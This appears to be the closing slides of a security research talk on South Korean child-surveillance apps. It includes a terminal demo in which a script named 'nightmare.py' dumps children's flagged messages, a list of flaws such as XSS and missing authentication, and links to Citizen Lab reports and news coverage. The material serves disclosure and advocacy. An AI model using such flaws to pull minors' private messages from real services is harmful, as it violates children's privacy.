  • 81. +600k Messages from +48k Children root@redstar-os $ python nightmare.py ### Messages from Child: From: ".인터넷" (5) 1. [KakaoTalk] (violence/gang up): "투명성성인기회" 2. [KakaoTalk] (blackmail/money): "깡패?" 3. [KakaoTalk] (violence/맞다): "한!!국교!!„ 4. [KakaoTalk] (blackmail/빌려달라): "보안어린이개방성사랑정?" 5. [KakaoTalk] (threat/kill): "성인성인괴상한해킹비밀한국성인강남스타일모바일„ From: ".사이버억압♡" (2) 1. [KakaoTalk] (rant/crazy girl acting as child): "투명♥♥" 2. [KakaoTalk] (abuse/fuck it): "비 밀사 이버비?밀번역 조 화정부 기 회개인 성 인 어린이정 ..." From: "010XXXXXXXX" (3) 1. [SMS] (harass/desperate): "어린이강남스?타일인터넷" 2. [SMS] (harass/): "깡패구글괴상한" 3. [SMS] (harass/desperate): "부패교육감?" From: ".사이버투♥" (3) 1. [KakaoTalk] (threat/kill): "해킹 평등" 2. [KakaoTalk] (harass/desperate): "자 기 검열보?" 3. [KakaoTalk] (violence/gang up): "강남스타일!!!"
  • 82. The Most Offensive Slide :O The 1086 "harmful" words that are monitored by smart dream
  • 83. Another big pile of • XSS • Lack of Authentication and Authorization • Accessing stored messages and searches • …
  • 84. • Take a step back • Imagine these apps were magically 100% secure • Would you trust any company or government... • ... to have a database with all that information? A note for reflexion
  • 85. If you know Korean Security Researchers, Journalists or Activists, raise awareness. → Korean society has to deal with these issues Have a look at the other child protection applications and relay results to human rights organizations. → perfect project for a university class Support organizations like OpenNet Korea, CitizenLab, Open Technology Fund, EFF, … What‘s next?
  • 86. I‘ve learned how virtualization works, by hiding p0rn inside VMWare in early 2000s (and never got busted).
  • 88. Other Korean Child Protection Apps • SKTelecom: https://play.google.com/store/apps/details?id=com.skt.thug .hazard&hl=ko • KT Corporation: https://play.google.com/store/apps/details?id=com.kt.olleh kidsafe&hl=ko • LG U+: https://play.google.com/store/apps/details?id=com.lguplus. cleanmobile&hl=ko • …
  • 89. Reports • [20 September 2015] Are the Kids Alright? Digital Risks to Minors from South Korea’s Smart Sheriff Application - https://citizenlab.org/2015/09/digital-risks-south-korea-smart- sheriff/ • [1 November 2015] The Kids are Still at Risk: Update to Citizen Lab’s “Are the Kids Alright?” Smart Sheriff report - https://citizenlab.org/2015/11/smart-sheriff-update/ • [21 September 2015] Submission to the 113th Session of the UN Human Rights Committee for Fourth Periodic Report of the Republic of Korea - http://opennetkorea.org/en/wp/wp- content/uploads/2016/03/INT_CCPR__KOR_OPEN_NETSmart- Sheriff.pdf
  • 90. Some News Articles • [19 May 2015] Don’t text ‘beer’ in Korea: Words that trigger teen alerts - http://www.japantimes.co.jp/news/2015/05/19/asia- pacific/dont-text-beer-korea-words-trigger-teen-alerts/ • [16 June 2015] South Korea provokes teenage smartphone privacy row - http://www.bbc.com/news/technology- 33091990 • [21 September 2015] Smart Sheriff child surveillance app leaves South Korean kids vulnerable to hackers - http://www.cbc.ca/news/technology/smart-sheriff- 1.3236682